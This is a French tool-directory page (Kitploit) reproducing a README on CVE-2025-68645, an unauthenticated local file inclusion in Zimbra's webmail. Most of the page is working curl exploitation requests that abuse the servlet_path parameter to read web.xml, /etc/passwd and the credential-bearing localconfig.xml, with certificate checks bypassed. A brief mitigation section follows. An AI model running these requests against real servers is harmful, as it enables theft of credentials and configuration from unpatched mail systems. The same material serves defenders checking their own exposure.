Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-68645 — CVE-2025-68645 | Kitploit
Outils/GitHubGitHub/0xblackash/cve-2025-68645
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsSécurité WebTests d'Intrusion
GitHub0xblackash/cve-2025-68645

CVE-2025-68645

CVE-2025-68645

Voir le dépôt
21il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛡️ CVE-2025-68645 - Analyse d'inclusion de fichier local (LFI) dans Zimbra

zimbra

Vulnerability Target Severity Status


📌 Aperçu

Ce document décrit une vulnérabilité d'inclusion de fichier local (LFI) affectant Zimbra Collaboration Suite.

Le problème provient d'une gestion inappropriée du paramètre suivant :

root@kitploit:~
/h/*?javax.servlet.include.servlet_path=

Cela permet à un utilisateur non authentifié d'accéder aux ressources internes de l'application.


🔍 Détails de la vulnérabilité

  • Type : Inclusion de fichier local (LFI)
  • Accès : Non authentifié
  • Composant concerné : Webmail (interface classique)
  • Vecteur d'attaque : Manipulation de requête HTTP
Télécharger l’outil

🧪 Vérification initiale

Requête de test :

root@kitploit:~
curl -k "https://TARGET/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml"

▶️ Démo :

cve-2025-68645
cve-2025-68645 1

✅ Résultat

  • Fichier interne récupéré avec succès
  • Confirme une gestion incorrecte des entrées

⚙️ Comportement du point d'accès

Plusieurs points d'accès traitent le paramètre vulnérable différemment.

Exemple :

root@kitploit:~
/h/printcalendar?javax.servlet.include.servlet_path=...

Observations :

  • Comportement d'accès aux fichiers plus cohérent
  • Meilleure fiabilité de réponse par rapport à /h/rest

🚧 Considération TLS

Problème

root@kitploit:~
SSL: certificate subject name does not match target host

Solution de contournement

root@kitploit:~
curl -k "https://TARGET/..."

🚀 Exemples d'exploitation

📂 Accès à une ressource Web interne

root@kitploit:~
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/WEB-INF/web.xml"

📂 Tentative d'accès à un fichier système

root@kitploit:~
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/etc/passwd"

🔐 Accès à la configuration de l'application

root@kitploit:~
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/opt/zimbra/conf/localconfig.xml"

Expositions potentielles :

  • Identifiants de service
  • Configuration interne
  • Détails d'infrastructure

🧠 Impact

Une exploitation réussie peut conduire à :

  • Divulgation de fichiers de configuration sensibles
  • Exposition des services et de l'architecture internes
  • Fuite d'identifiants
  • Risque accru de compromission supplémentaire

🛡️ Atténuation

  • Mettre à jour Zimbra vers les versions corrigées

  • Restreindre l'accès aux points d'accès vulnérables

  • Surveiller les journaux pour les paramètres suspects :

    • javax.servlet.include.servlet_path
  • Déployer des règles WAF pour bloquer les motifs malveillants


💡 Points clés à retenir

  • Les échecs de validation des entrées peuvent exposer des ressources internes
  • Différents points d'accès peuvent se comporter de manière inconsistante
  • Les fichiers de configuration contiennent souvent des informations critiques
  • Une détection précoce réduit considérablement les risques

🏴 Conclusion

  • Vulnérabilité confirmée : CVE-2025-68645
  • L'exploitation permet un accès non autorisé aux fichiers
  • Une correction immédiate est fortement recommandée

🔐 La sécurité compte